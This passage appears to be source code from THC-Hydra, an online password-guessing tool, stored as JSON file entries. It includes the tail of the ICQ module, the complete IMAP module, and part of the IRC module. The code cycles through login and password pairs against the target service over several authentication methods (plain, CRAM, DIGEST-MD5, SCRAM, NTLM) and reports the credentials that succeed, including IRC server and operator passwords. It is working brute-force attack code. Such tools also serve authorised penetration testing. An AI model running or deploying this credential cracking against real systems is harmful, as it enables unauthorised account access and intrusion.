(hydra_send(s, buf, 10, 0));\n}\n\nint32_t icq_disconnect(int32_t s, char *login) {\n unsigned long uin = strtoul(login, NULL, 10);\n char buf[64];\n\n bzero(buf, sizeof(buf));\n icq_header(buf, 0x0438, uin);\n buf[10] = 20;\n memcpy(&buf[12], \"B_USER_DISCONNECTED\", 20);\n buf[32] = 0x5;\n return (hydra_send(s, buf, 34, 0));\n}\n\nint32_t icq_ack(int32_t s, char *login) {\n unsigned long uin = strtoul(login, NULL, 10);\n char buf[64];\n\n buf[0] = 0x02;\n buf[1] = 0x00;\n buf[2] = 0x0a;\n buf[3] = 0x0;\n buf[4] = seq & 0xff;\n buf[5] = (seq >> 8) & 0xff;\n buf[6] = uin & 0xff;\n buf[7] = (uin >> 8) & 0xff;\n buf[8] = (uin >> 16) & 0xff;\n buf[9] = (uin >> 24) & 0xff;\n\n return (hydra_send(s, buf, 10, 0));\n}\n\nint32_t start_icq(int32_t sock, char *ip, int32_t port, FILE *output, char *miscptr, FILE *fp) {\n unsigned char buf[1024];\n char *login, *pass;\n char *empty = \"\";\n int32_t i, r;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n return 2;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n for (i = 0; login[i]; i++)\n if (!isdigit((int32_t)login[i])) {\n fprintf(stderr, \"[ERROR] Invalid UIN %s\\n, ignoring.\", login);\n hydra_completed_pair();\n return 2;\n }\n\n icq_login(sock, login, pass);\n\n while (1) {\n if ((r = hydra_recv(sock, (char *)buf, sizeof(buf))) == 0) {\n return 1;\n }\n\n if (r < 0) {\n if (verbose)\n fprintf(stderr, \"[ERROR] Process %d: Can not connect [unreachable]\\n\", (int32_t)getpid());\n return 3;\n }\n\n if (buf[2] == 0x5a && buf[3] == 0x00) {\n hydra_report_found_host(port, ip, \"icq\", output);\n hydra_completed_pair_found();\n icq_ack(sock, login);\n icq_login_1(sock, login);\n hydra_recv(sock, (char *)buf, sizeof(buf));\n icq_ack(sock, login);\n hydra_recv(sock, (char *)buf, sizeof(buf));\n icq_ack(sock, login);\n icq_disconnect(sock, login);\n break;\n } else if ((buf[2] != 10 && buf[2] != 250) || buf[3] != 0) {\n hydra_completed_pair();\n break;\n }\n\n /* if((buf[2] != 10 || buf[3] != 0) && (buf[2] != 250 || buf[3] != 0))\n */\n }\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n}\n\nvoid service_icq(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_ICQ;\n\n if (port)\n myport = port;\n\n port = myport;\n\n if ((options & OPTION_SSL) != 0 && child_head_no == 0) {\n fprintf(stderr, \"[ERROR] You can not use SSL with ICQ!\\n\");\n hydra_child_exit(0);\n }\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n while (1) {\n switch (run) {\n case 1:\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n sock = hydra_connect_udp(ip, myport);\n if (sock < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n case 2:\n next_run = start_icq(sock, ip, port, fp, miscptr, fp);\n break;\n case 3:\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n break;\n default:\n fprintf(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n break;\n }\n run = next_run;\n }\n}\n\nint32_t service_icq_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-imap.c", "content": "#include \"hydra-mod.h\"\n#include \"sasl.h\"\n\nextern char *HYDRA_EXIT;\nchar *buf;\nint32_t counter;\n\nint32_t imap_auth_mechanism = AUTH_CLEAR;\n\nchar *imap_read_server_capacity(int32_t sock) {\n char *ptr = NULL;\n int32_t resp = 0;\n char *buf = NULL;\n\n do {\n if (buf != NULL)\n free(buf);\n ptr = buf = hydra_receive_line(sock);\n if (buf != NULL) {\n if (strstr(buf, \"CAPABILITY\") != NULL && buf[0] == '*') {\n resp = 1;\n usleepn(300);\n /* we got the capability info then get the completed warning info from\n * server */\n while (hydra_data_ready(sock)) {\n free(buf);\n buf = hydra_receive_line(sock);\n }\n } else {\n if (buf[strlen(buf) - 1] == '\\n')\n buf[strlen(buf) - 1] = 0;\n if (buf[strlen(buf) - 1] == '\\r')\n buf[strlen(buf) - 1] = 0;\n if (isdigit((int32_t)*ptr) && *(ptr + 1) == ' ') {\n resp = 1;\n }\n }\n }\n } while (buf != NULL && resp == 0);\n return buf;\n}\n\nint32_t start_imap(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\", *result = NULL;\n char *login, *pass, buffer[500], buffer2[500], *fooptr;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n while (hydra_data_ready(s)) {\n if ((buf = hydra_receive_line(s)) == NULL)\n return (1);\n free(buf);\n }\n\n switch (imap_auth_mechanism) {\n case AUTH_LOGIN:\n sprintf(buffer, \"%d AUTHENTICATE LOGIN\\r\\n\", counter);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (strstr(buf, \" NO \") != NULL || strstr(buf, \"failed\") != NULL || strstr(buf, \" BAD \") != NULL) {\n hydra_report(stderr, \"[ERROR] IMAP LOGIN AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n free(buf);\n strcpy(buffer2, login);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n\n sprintf(buffer, \"%.250s\\r\\n\", buffer2);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (strstr(buf, \" NO \") != NULL || strstr(buf, \"failed\") != NULL || strstr(buf, \" BAD \") != NULL) {\n hydra_report(stderr, \"[ERROR] IMAP LOGIN AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n free(buf);\n strcpy(buffer2, pass);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer, \"%.250s\\r\\n\", buffer2);\n break;\n\n case AUTH_PLAIN:\n sprintf(buffer, \"%d AUTHENTICATE PLAIN\\r\\n\", counter);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (strstr(buf, \" NO \") != NULL || strstr(buf, \"failed\") != NULL || strstr(buf, \" BAD \") != NULL) {\n hydra_report(stderr, \"[ERROR] IMAP PLAIN AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n free(buf);\n\n memset(buffer2, 0, sizeof(buffer2));\n result = sasl_plain(buffer2, login, pass);\n if (result == NULL)\n return 3;\n sprintf(buffer, \"%.250s\\r\\n\", buffer2);\n break;\n\n#ifdef LIBOPENSSL\n case AUTH_CRAMMD5:\n case AUTH_CRAMSHA1:\n case AUTH_CRAMSHA256: {\n int32_t rc = 0;\n char *preplogin;\n\n rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);\n if (rc) {\n return 3;\n }\n\n switch (imap_auth_mechanism) {\n case AUTH_CRAMMD5:\n sprintf(buffer, \"%d AUTHENTICATE CRAM-MD5\\r\\n\", counter);\n break;\n case AUTH_CRAMSHA1:\n sprintf(buffer, \"%d AUTHENTICATE CRAM-SHA1\\r\\n\", counter);\n break;\n case AUTH_CRAMSHA256:\n sprintf(buffer, \"%d AUTHENTICATE CRAM-SHA256\\r\\n\", counter);\n break;\n }\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n // get the one-time BASE64 encoded challenge\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (strstr(buf, \" NO \") != NULL || strstr(buf, \"failed\") != NULL || strstr(buf, \" BAD \") != NULL || strstr(buf, \"BYE\") != NULL) {\n switch (imap_auth_mechanism) {\n case AUTH_CRAMMD5:\n hydra_report(stderr, \"[ERROR] IMAP CRAM-MD5 AUTH : %s\\n\", buf);\n break;\n case AUTH_CRAMSHA1:\n hydra_report(stderr, \"[ERROR] IMAP CRAM-SHA1 AUTH : %s\\n\", buf);\n break;\n case AUTH_CRAMSHA256:\n hydra_report(stderr, \"[ERROR] IMAP CRAM-SHA256 AUTH : %s\\n\", buf);\n break;\n }\n free(buf);\n return 3;\n }\n\n memset(buffer, 0, sizeof(buffer));\n from64tobits((char *)buffer, buf + 2);\n free(buf);\n\n memset(buffer2, 0, sizeof(buffer2));\n\n switch (imap_auth_mechanism) {\n case AUTH_CRAMMD5: {\n result = sasl_cram_md5(buffer2, pass, buffer);\n if (result == NULL)\n return 3;\n sprintf(buffer, \"%s %.250s\", preplogin, buffer2);\n } break;\n case AUTH_CRAMSHA1: {\n result = sasl_cram_sha1(buffer2, pass, buffer);\n if (result == NULL)\n return 3;\n sprintf(buffer, \"%s %.250s\", preplogin, buffer2);\n } break;\n case AUTH_CRAMSHA256: {\n result = sasl_cram_sha256(buffer2, pass, buffer);\n if (result == NULL)\n return 3;\n sprintf(buffer, \"%s %.250s\", preplogin, buffer2);\n } break;\n }\n hydra_tobase64((unsigned char *)buffer, strlen(buffer), sizeof(buffer));\n\n char tmp_buffer[sizeof(buffer)];\n sprintf(tmp_buffer, \"%.250s\\r\\n\", buffer);\n strcpy(buffer, tmp_buffer);\n\n free(preplogin);\n } break;\n case AUTH_DIGESTMD5: {\n sprintf(buffer, \"%d AUTHENTICATE DIGEST-MD5\\r\\n\", counter);\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n // receive\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (strstr(buf, \" NO \") != NULL || strstr(buf, \"failed\") != NULL || strstr(buf, \" BAD \") != NULL || strstr(buf, \"BYE\") != NULL) {\n hydra_report(stderr, \"[ERROR] IMAP DIGEST-MD5 AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n memset(buffer, 0, sizeof(buffer));\n from64tobits((char *)buffer, buf);\n free(buf);\n\n if (debug)\n hydra_report(stderr, \"DEBUG S: %s\\n\", buffer);\n\n fooptr = buffer2;\n result = sasl_digest_md5(fooptr, login, pass, buffer, miscptr, \"imap\", NULL, 0, NULL);\n if (result == NULL)\n return 3;\n if (debug)\n hydra_report(stderr, \"DEBUG C: %s\\n\", buffer2);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer, \"%s\\r\\n\", buffer2);\n\n } break;\n case AUTH_SCRAMSHA1: {\n char clientfirstmessagebare[200];\n char serverfirstmessage[200];\n char *preplogin;\n int32_t rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);\n\n if (rc) {\n return 3;\n }\n sprintf(buffer, \"%d AUTHENTICATE SCRAM-SHA-1\\r\\n\", counter);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (strstr(buf, \" NO \") != NULL || strstr(buf, \"failed\") != NULL || strstr(buf, \" BAD \") != NULL || strstr(buf, \"BYE\") != NULL) {\n hydra_report(stderr, \"[ERROR] IMAP SCRAM-SHA1 AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n free(buf);\n\n snprintf(clientfirstmessagebare, sizeof(clientfirstmessagebare), \"n=%s,r=hydra\", preplogin);\n free(preplogin);\n memset(buffer2, 0, sizeof(buffer2));\n sprintf(buffer2, \"n,,%.200s\", clientfirstmessagebare);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n snprintf(buffer, sizeof(buffer), \"%s\\r\\n\", buffer2);\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n buf = hydra_receive_line(s);\n if (buf == NULL)\n return 1;\n if (strstr(buf, \" NO \") != NULL || strstr(buf, \"failed\") != NULL || strstr(buf, \" BAD \") != NULL || strstr(buf, \"BYE\") != NULL) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Not a valid server challenge\\n\");\n free(buf);\n return 1;\n } else {\n /* recover server challenge */\n memset(buffer, 0, sizeof(buffer));\n //+ cj1oeWRyYU9VNVZqcHQ5RjNqcmVXRVFWTCxzPWhGbTNnRGw0akdidzJVVHosaT00MDk2\n from64tobits((char *)buffer, buf + 2);\n free(buf);\n strncpy(serverfirstmessage, buffer, sizeof(serverfirstmessage) - 1);\n serverfirstmessage[sizeof(serverfirstmessage) - 1] = '\\0';\n\n memset(buffer2, 0, sizeof(buffer2));\n fooptr = buffer2;\n result = sasl_scram_sha1(fooptr, pass, clientfirstmessagebare, serverfirstmessage);\n if (result == NULL) {\n hydra_report(stderr, \"[ERROR] Can't compute client response\\n\");\n return 1;\n }\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer, \"%s\\r\\n\", buffer2);\n }\n } break;\n#endif\n case AUTH_NTLM: {\n unsigned char buf1[4096];\n unsigned char buf2[4096];\n\n // Send auth request\n sprintf(buffer, \"%d AUTHENTICATE NTLM\\r\\n\", counter);\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n // receive\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (strstr(buf, \" NO \") != NULL || strstr(buf, \"failed\") != NULL || strstr(buf, \" BAD \") != NULL || strstr(buf, \"BYE\") != NULL) {\n hydra_report(stderr, \"[ERROR] IMAP NTLM AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n free(buf);\n // send auth and receive challenge\n // send auth request: lst the server send it's own hostname and domainname\n buildAuthRequest((tSmbNtlmAuthRequest *)buf2, 0, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *)buf2));\n\n sprintf(buffer, \"%s\\r\\n\", buf1);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (strlen(buf) < 6) {\n free(buf);\n return 1;\n }\n\n // recover challenge\n from64tobits((char *)buf1, buf + 2);\n free(buf);\n\n // Send response\n buildAuthResponse((tSmbNtlmAuthChallenge *)buf1, (tSmbNtlmAuthResponse *)buf2, 0, login, pass, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *)buf2));\n\n sprintf(buffer, \"%s\\r\\n\", buf1);\n } break;\n default:\n // clear authentication\n sprintf(buffer, \"%d LOGIN \\\"%.100s\\\" \\\"%.100s\\\"\\r\\n\", counter, login, pass);\n }\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return (1);\n\n if (strstr(buf, \" NO \") != NULL || strstr(buf, \"failed\") != NULL || strstr(buf, \" BAD \") != NULL || strstr(buf, \"BYE\") != NULL) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] %s\\n\", buf);\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n if (counter == 4)\n return 1;\n return (2);\n }\n free(buf);\n\n hydra_report_found_host(port, ip, \"imap\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n}\n\nvoid service_imap(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_IMAP, mysslport = PORT_IMAP_SSL, disable_tls = 1;\n char *buffer1 = \"1 CAPABILITY\\r\\n\";\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(275);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n buf = hydra_receive_line(sock);\n\n if ((buf == NULL) || (strstr(buf, \"OK\") == NULL && buf[0] != '*')) { /* check the first line */\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Not an IMAP protocol or service shutdown:\\n\");\n if (buf != NULL)\n free(buf);\n hydra_child_exit(2);\n }\n free(buf);\n /* send capability request */\n if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)\n exit(-1);\n counter = 2;\n buf = imap_read_server_capacity(sock);\n\n if (buf == NULL) {\n hydra_child_exit(2);\n }\n\n if ((miscptr != NULL) && (strlen(miscptr) > 0)) {\n int32_t i;\n\n for (i = 0; i < strlen(miscptr); i++)\n miscptr[i] = (char)toupper((int32_t)miscptr[i]);\n\n if (strstr(miscptr, \"TLS\") || strstr(miscptr, \"SSL\") || strstr(miscptr, \"STARTTLS\")) {\n disable_tls = 0;\n }\n }\n#ifdef LIBOPENSSL\n if (!disable_tls) {\n /* check for STARTTLS, if available we may have access to more basic\n * auth methods */\n if (strstr(buf, \"STARTTLS\") != NULL) {\n hydra_send(sock, \"2 STARTTLS\\r\\n\", strlen(\"2 STARTTLS\\r\\n\"), 0);\n counter++;\n free(buf);\n buf = hydra_receive_line(sock);\n if (buf == NULL || (strstr(buf, \" NO \") != NULL || strstr(buf, \"failed\") != NULL || strstr(buf, \" BAD \") != NULL)) {\n hydra_report(stderr, \"[ERROR] TLS negotiation failed, no answer \"\n \"received from STARTTLS request\\n\");\n } else {\n free(buf);\n if ((hydra_connect_to_ssl(sock, hostname) == -1)) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Can't use TLS\\n\");\n disable_tls = 1;\n run = 1;\n break;\n } else {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] TLS connection done\\n\");\n }\n /* ask again capability request but in TLS mode */\n if (hydra_send(sock, \"3 CAPABILITY\\r\\n\", strlen(\"3 CAPABILITY\\r\\n\"), 0) < 0)\n hydra_child_exit(2);\n buf = imap_read_server_capacity(sock);\n counter++;\n if (buf == NULL)\n hydra_child_exit(2);\n }\n } else\n hydra_report(stderr, \"[ERROR] option to use TLS/SSL failed as it is \"\n \"not supported by the server\\n\");\n }\n#endif\n\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] CAPABILITY: %s\", buf);\n\n // authentication should be listed AUTH= like in the extract below\n // STARTTLS LOGINDISABLED AUTH=GSSAPI AUTH=DIGEST-MD5 AUTH=CRAM-MD5\n if ((strstr(buf, \"=LOGIN\") == NULL) && (strstr(buf, \"=NTLM\") != NULL)) {\n imap_auth_mechanism = AUTH_NTLM;\n }\n#ifdef LIBOPENSSL\n if ((strstr(buf, \"=LOGIN\") == NULL) && (strstr(buf, \"=SCRAM-SHA-1\") != NULL)) {\n imap_auth_mechanism = AUTH_SCRAMSHA1;\n }\n\n if ((strstr(buf, \"=LOGIN\") == NULL) && (strstr(buf, \"=DIGEST-MD5\") != NULL)) {\n imap_auth_mechanism = AUTH_DIGESTMD5;\n }\n\n if ((strstr(buf, \"=LOGIN\") == NULL) && (strstr(buf, \"=CRAM-SHA256\") != NULL)) {\n imap_auth_mechanism = AUTH_CRAMSHA256;\n }\n\n if ((strstr(buf, \"=LOGIN\") == NULL) && (strstr(buf, \"=CRAM-SHA1\") != NULL)) {\n imap_auth_mechanism = AUTH_CRAMSHA1;\n }\n\n if ((strstr(buf, \"=LOGIN\") == NULL) && (strstr(buf, \"=CRAM-MD5\") != NULL)) {\n imap_auth_mechanism = AUTH_CRAMMD5;\n }\n#endif\n if ((strstr(buf, \"=LOGIN\") == NULL) && (strstr(buf, \"=PLAIN\") != NULL)) {\n imap_auth_mechanism = AUTH_PLAIN;\n }\n\n if (strstr(buf, \"=LOGIN\") != NULL) {\n imap_auth_mechanism = AUTH_LOGIN;\n }\n free(buf);\n\n if ((miscptr != NULL) && (strlen(miscptr) > 0)) {\n if (strstr(miscptr, \"CLEAR\"))\n imap_auth_mechanism = AUTH_CLEAR;\n\n if (strstr(miscptr, \"LOGIN\"))\n imap_auth_mechanism = AUTH_LOGIN;\n\n if (strstr(miscptr, \"PLAIN\"))\n imap_auth_mechanism = AUTH_PLAIN;\n\n#ifdef LIBOPENSSL\n if (strstr(miscptr, \"CRAM-MD5\"))\n imap_auth_mechanism = AUTH_CRAMMD5;\n\n if (strstr(miscptr, \"CRAM-SHA1\"))\n imap_auth_mechanism = AUTH_CRAMSHA1;\n\n if (strstr(miscptr, \"CRAM-SHA256\"))\n imap_auth_mechanism = AUTH_CRAMSHA256;\n\n if (strstr(miscptr, \"DIGEST-MD5\"))\n imap_auth_mechanism = AUTH_DIGESTMD5;\n\n if (strstr(miscptr, \"SCRAM-SHA1\"))\n imap_auth_mechanism = AUTH_SCRAMSHA1;\n\n#endif\n if (strstr(miscptr, \"NTLM\"))\n imap_auth_mechanism = AUTH_NTLM;\n }\n\n if (verbose) {\n switch (imap_auth_mechanism) {\n case AUTH_CLEAR:\n hydra_report(stderr, \"[VERBOSE] using IMAP CLEAR LOGIN mechanism\\n\");\n break;\n case AUTH_LOGIN:\n hydra_report(stderr, \"[VERBOSE] using IMAP LOGIN AUTH mechanism\\n\");\n break;\n case AUTH_PLAIN:\n hydra_report(stderr, \"[VERBOSE] using IMAP PLAIN AUTH mechanism\\n\");\n break;\n#ifdef LIBOPENSSL\n case AUTH_CRAMMD5:\n hydra_report(stderr, \"[VERBOSE] using IMAP CRAM-MD5 AUTH mechanism\\n\");\n break;\n case AUTH_CRAMSHA1:\n hydra_report(stderr, \"[VERBOSE] using IMAP CRAM-SHA1 AUTH mechanism\\n\");\n break;\n case AUTH_CRAMSHA256:\n hydra_report(stderr, \"[VERBOSE] using IMAP CRAM-SHA256 AUTH mechanism\\n\");\n break;\n case AUTH_DIGESTMD5:\n hydra_report(stderr, \"[VERBOSE] using IMAP DIGEST-MD5 AUTH mechanism\\n\");\n break;\n case AUTH_SCRAMSHA1:\n hydra_report(stderr, \"[VERBOSE] using IMAP SCRAM-SHA1 AUTH mechanism\\n\");\n break;\n#endif\n case AUTH_NTLM:\n hydra_report(stderr, \"[VERBOSE] using IMAP NTLM AUTH mechanism\\n\");\n break;\n }\n }\n\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_imap(sock, ip, port, options, miscptr, fp);\n counter++;\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_imap_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_imap(const char *service) {\n printf(\"Module imap is optionally taking one authentication type of:\\n\"\n \" CLEAR or APOP (default), LOGIN, PLAIN, CRAM-MD5, CRAM-SHA1,\\n\"\n \" CRAM-SHA256, DIGEST-MD5, NTLM\\n\"\n \"Additionally TLS encryption via STARTTLS can be enforced with the \"\n \"TLS option.\\n\\n\"\n \"Example: imap://target/TLS:PLAIN\\n\");\n}\n" }, { "path": "hydra-irc.c", "content": "#include \"hydra-mod.h\"\n\n/*\n\nRFC 1459: Internet Relay Chat Protocol\n\n*/\n\nextern char *HYDRA_EXIT;\nchar buffer[300] = \"\";\nint32_t myport = PORT_IRC, mysslport = PORT_IRC_SSL;\n\nint32_t start_oper_irc(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass;\n int32_t ret;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n sprintf(buffer, \"OPER %s %s\\r\\n\", login, pass);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 3;\n }\n ret = hydra_recv(s, buffer, sizeof(buffer) - 1);\n if (ret >= 0)\n buffer[ret] = 0;\n /* :irc.debian.org 381 koma :You are now an IRC Operator */\n /* :irc.debian.org 464 koma :Invalid password */\n if ((ret > 0) && (strstr(buffer, \" 381 \") != NULL)) {\n hydra_report_found_host(port, ip, \"irc\", fp);\n hydra_completed_pair_found();\n } else {\n hydra_completed_pair();\n }\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 2;\n}\n\nint32_t send_nick(int32_t s, char *ip, char *pass) {\n if (strlen(pass) > 0) {\n sprintf(buffer, \"PASS %s\\r\\n\", pass);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return -1;\n }\n }\n sprintf(buffer, \"CAP LS\\r\\n\");\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return -1;\n }\n sprintf(buffer, \"NICK hydra%d\\r\\nUSER hydra%d hydra %s :hydra\\r\\n\", (int32_t)getpid(), (int32_t)getpid(), hydra_address2string(ip));\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return -1;\n }\n return 0;\n}\n\nint32_t irc_server_connect(char *ip, int32_t sock, int32_t port, unsigned char options, char *hostname) {\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(275);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n return sock;\n}\n\nint32_t start_pass_irc(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp, char *hostname) {\n char *empty = \"\";\n char *pass;\n int32_t ret;\n\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n s = irc_server_connect(ip, s, port, options, hostname);\n if (s < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n return 3;\n }\n\n if (send_nick(s, ip, pass) < 0) {\n return 3;\n }\n\n ret = hydra_recv(s, buffer, sizeof(buffer) - 1);\n if (ret >= 0)\n buffer[ret] = 0;\n#ifdef HAVE_PCRE\n if ((ret > 0) && (!hydra_string_match(buffer, \"ERROR\\\\s.*password\"))) {\n#else\n if ((ret > 0) && (strstr(buffer, \"ERROR\") == NULL)) {\n#endif\n hydra_report_pass_found(port, ip, \"irc\", fp);\n hydra_completed_pair_found();\n hydra_report(stderr,\n \"[INFO] Server password '%s' is working, you can pass it as \"\n \"argument\\nto irc module to then try login/password oper mode\\n\",\n pass);\n } else {\n if (verbose && (miscptr != NULL))\n hydra_report(stderr,\n \"[VERBOSE] Server is requesting a general password, '%s' \"\n \"you entered is not working\\n\",\n miscptr);\n hydra_completed_pair();\n }\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 4;\n}\n\nvoid service_irc(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1, ret;\n char *buf;\n\n hydra_register_socket(sp);\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n next_run = 0;\n switch (run) {\n case 1: /* connect and service init function */\n\n sock = irc_server_connect(ip, sock, port, options, hostname);\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n\n if (miscptr == NULL) {\n miscptr = \"\";\n }\n if (send_nick(sock, ip, miscptr) < 0) {\n hydra_child_exit(1);\n }\n\n buffer[0] = 0;\n if ((ret = hydra_recv(sock, buffer, sizeof(buffer) - 1)) >= 0)\n buffer[ret] = 0;\n\n /* ERROR :Bad password */\n#ifdef HAVE_PCRE\n if ((ret > 0) && (hydra_string_match(buffer, \"ERROR\\\\s.*password\"))) {\n#else\n if ((ret > 0) && (strstr(buffer, \"ERROR\") != NULL)) {\n#endif\n if (verbose)\n hydra_report(stderr, \"[INFO] Server is requesting a password, will try to find it\\n\");\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n next_run = 4;\n break;\n }\n\n while (hydra_data_ready(sock)) {\n buf = hydra_receive_line(sock);\n free(buf);\n }\n\n if ((ret > 0) && (strstr(buffer, \" 432 \") != NULL)) {\n /* :irc.debian.org 432 * hydra_5075 :Erroneous nickname 